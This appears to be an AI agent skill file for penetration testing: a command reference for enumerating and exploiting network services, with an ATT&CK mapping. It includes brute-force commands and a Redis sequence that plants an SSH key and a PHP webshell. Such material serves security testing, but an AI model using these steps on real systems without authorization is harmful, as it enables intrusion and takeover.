| name | enumerating-network-services |
| description | Enumerate and exploit network services including SMB, FTP, SSH, RDP, HTTP, databases (MySQL, MSSQL, PostgreSQL, MongoDB), LDAP, NFS, DNS, and SNMP. Use when testing network service security or performing port-based exploitation. |
| verified | 2026-07-27T00:00:00.000Z |
Network Service Enumeration Skill
You are a network penetration testing expert specializing in service enumeration and exploitation. Use this skill when the user requests help with:
- Enumerating network services by port
- Exploiting common network services (SMB, FTP, SSH, RDP, etc.)
- Database service testing (MySQL, MSSQL, PostgreSQL, MongoDB)
- Service-specific vulnerability identification
- Banner grabbing and version detection
- Network protocol analysis
When to Use
Activate this skill when the user asks to:
- Enumerate network services on specific ports
- Test common network service vulnerabilities
- Connect to and exploit database services
- Perform service-specific reconnaissance
- Identify service misconfigurations
- Extract data from network services
- Help with network penetration testing
When NOT to Use
- Source code is available — use
auditing-code-for-vulnerabilities
- Web application layer specifically — use
testing-web-applications
- Cloud provider APIs and control plane — use
exploiting-cloud-platforms
- Passive OSINT before you touch the target — use
performing-reconnaissance
- ICS/OT protocols on the network (Modbus/502, DNP3, S7comm/102, OPC UA,
BACnet) — use
testing-ics-ot-protocols; scanning these the way you scan IT
services can crash a PLC, and the safety rules differ
Core Methodologies
1. Port Scanning and Service Discovery
Nmap Scanning Strategies:
nmap -sC -sV -oA scan 10.10.10.10
nmap -p- -T4 10.10.10.10
nmap -p- -sV -sC -A 10.10.10.10 -oA full-scan
sudo nmap -sU --top-ports 1000 10.10.10.10
nmap -A -T4 10.10.10.10
nmap -p 445 --script smb-* 10.10.10.10
nmap -p 21 --script ftp-* 10.10.10.10
nmap -sV --version-intensity 9 10.10.10.10
sudo nmap -O 10.10.10.10
Fast Port Scanning:
masscan -p1-65535 10.10.10.10 --rate=1000
rustscan -a 10.10.10.10 -- -sC -sV
2. SMB/SAMBA (Port 139, 445)
Enumeration:
nmap -p 445 --script smb-protocols 10.10.10.10
nmap -p 445 --script smb-security-mode 10.10.10.10
nmap -p 445 --script smb-enum-shares 10.10.10.10
nmap -p 445 --script smb-enum-users 10.10.10.10
smbclient -L //10.10.10.10 -N
smbclient -L //10.10.10.10 -U username
smbmap -H 10.10.10.10
smbmap -H 10.10.10.10 -u username -p password
smbmap -H 10.10.10.10 -u username -p password -R
enum4linux -a 10.10.10.10
enum4linux -U -M -S -P -G 10.10.10.10
nxc smb 10.10.10.10
nxc smb 10.10.10.10 -u '' -p ''
nxc smb 10.10.10.10 -u username -p password --shares
nxc smb 10.10.10.10 -u username -p password --users
Connect to Shares:
smbclient //10.10.10.10/share -U username
smbclient //10.10.10.10/share -N
mount -t cifs //10.10.10.10/share /mnt/smb -o username=user,password=pass
smbget -R smb://10.10.10.10/share -U username
SMB Vulnerabilities:
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.10
nmap -p 445 --script smb-vuln-* 10.10.10.10
3. FTP (Port 21)
Enumeration:
ftp 10.10.10.10
nmap -p 21 --script ftp-anon 10.10.10.10
nmap -p 21 --script ftp-bounce 10.10.10.10
nmap -p 21 --script ftp-brute 10.10.10.10
wget -r ftp://anonymous:anonymous@10.10.10.10/
FTP Commands:
ls -la
cd directory
get filename
mget *
put filename
binary
4. SSH (Port 22)
Enumeration:
nc 10.10.10.10 22
nmap -p 22 -sV 10.10.10.10
./ssh-user-enum.py --port 22 --userList users.txt 10.10.10.10
hydra -l root -P wordlist.txt ssh://10.10.10.10
SSH Key Auth:
ssh -i id_rsa user@10.10.10.10
chmod 600 id_rsa
ssh-keygen -t rsa -b 4096
5. HTTP/HTTPS (Port 80, 443, 8080, 8443)
Web Enumeration:
whatweb http://10.10.10.10
nikto -h http://10.10.10.10
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u http://10.10.10.10 -w wordlist.txt
ffuf -u http://10.10.10.10/FUZZ -w wordlist.txt
gobuster dns -d example.com -w subdomains.txt
ffuf -u http://FUZZ.example.com -w subdomains.txt
gobuster vhost -u http://10.10.10.10 -w vhosts.txt
SSL/TLS Testing:
openssl s_client -connect 10.10.10.10:443
nmap -p 443 --script ssl-* 10.10.10.10
testssl.sh https://10.10.10.10
6. RDP (Port 3389)
Enumeration:
nmap -p 3389 --script rdp-* 10.10.10.10
nmap -p 3389 -sV 10.10.10.10
Connect:
rdesktop 10.10.10.10
xfreerdp /u:Administrator /p:password /v:10.10.10.10
xfreerdp /u:user /d:DOMAIN /v:10.10.10.10
Brute Force:
hydra -l administrator -P passwords.txt rdp://10.10.10.10
crowbar -b rdp -s 10.10.10.10/32 -u admin -C passwords.txt
7-10. Database Services (MySQL, MSSQL, PostgreSQL, MongoDB)
Full per-service enumeration and exploitation command catalogs for MySQL/MariaDB
(3306), MSSQL (1433), PostgreSQL (5432), and MongoDB (27017) live in
references/database-services.md.
11. Redis (Port 6379)
Enumeration:
redis-cli -h 10.10.10.10
nmap -p 6379 --script redis-* 10.10.10.10
Redis Exploitation:
INFO
CONFIG GET dir
CONFIG GET dbfilename
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys
SET mykey "ssh-rsa AAAA..."
SAVE
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
SET mykey "<?php syst[e]m($_GET['cmd']); ?>"
SAVE
syst[e]m is system, bracketed so this file does not match antivirus
webshell signatures. See "Antivirus false positives" in the repo README.
12. LDAP (Port 389, 636)
Enumeration:
nmap -p 389 --script ldap-* 10.10.10.10
ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=local"
ldapsearch -x -H ldap://10.10.10.10 -D "user@domain.local" -w password -b "DC=domain,DC=local"
ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=local" "(objectClass=*)"
13. NFS (Port 2049)
Enumeration:
showmount -e 10.10.10.10
nmap -p 2049 --script nfs-* 10.10.10.10
Mount NFS:
mkdir /mnt/nfs
mount -t nfs 10.10.10.10:/share /mnt/nfs
df -h
14. DNS (Port 53)
Enumeration:
dig axfr @10.10.10.10 domain.com
host -l domain.com 10.10.10.10
dnsenum domain.com
dnsrecon -d domain.com -t std
fierce -dns domain.com
nmap -p 53 --script dns-* 10.10.10.10
15. SNMP (Port 161)
Enumeration:
snmpwalk -v2c -c public 10.10.10.10
snmpwalk -v2c -c public 10.10.10.10 1.3.6.1.2.1.1
onesixtyone -c community.txt 10.10.10.10
snmp-check 10.10.10.10 -c public
Quick Service Testing Commands
Banner Grabbing:
nc -nv 10.10.10.10 80
nc -nv 10.10.10.10 21
telnet 10.10.10.10 80
telnet 10.10.10.10 25
nmap -sV --script=banner 10.10.10.10
Reference Links
ATT&CK Coverage
Generated from secskills-core/ttp-index.json — edit that file, then run
python3 scripts/sync_attack.py --write. Re-verify IDs against the
current ATT&CK release before citing them in a report.
Reconnaissance (TA0043)
- T1595 Active Scanning — see also
performing-reconnaissance
- T1595.002 Vulnerability Scanning
Initial Access (TA0001)
- T1133 External Remote Services (also Persistence)
- T1190 Exploit Public-Facing Application — see also
testing-web-applications, testing-apis
Execution (TA0002)
- T1059 Command and Scripting Interpreter — see also
testing-web-applications
Credential Access (TA0006)
- T1040 Network Sniffing (also Discovery) — see also
attacking-wireless-networks
Discovery (TA0007)
- T1018 Remote System Discovery — see also
attacking-active-directory
- T1046 Network Service Discovery
Lateral Movement (TA0008)
- T1021 Remote Services — see also
attacking-active-directory
- T1021.002 SMB/Windows Admin Shares — see also
attacking-active-directory
- T1021.004 SSH — see also
escalating-linux-privileges
- T1210 Exploitation of Remote Services — see also
analyzing-binaries
Detection content for any of these: engineering-detections. Proactive search: hunting-threats. Post-compromise: responding-to-incidents.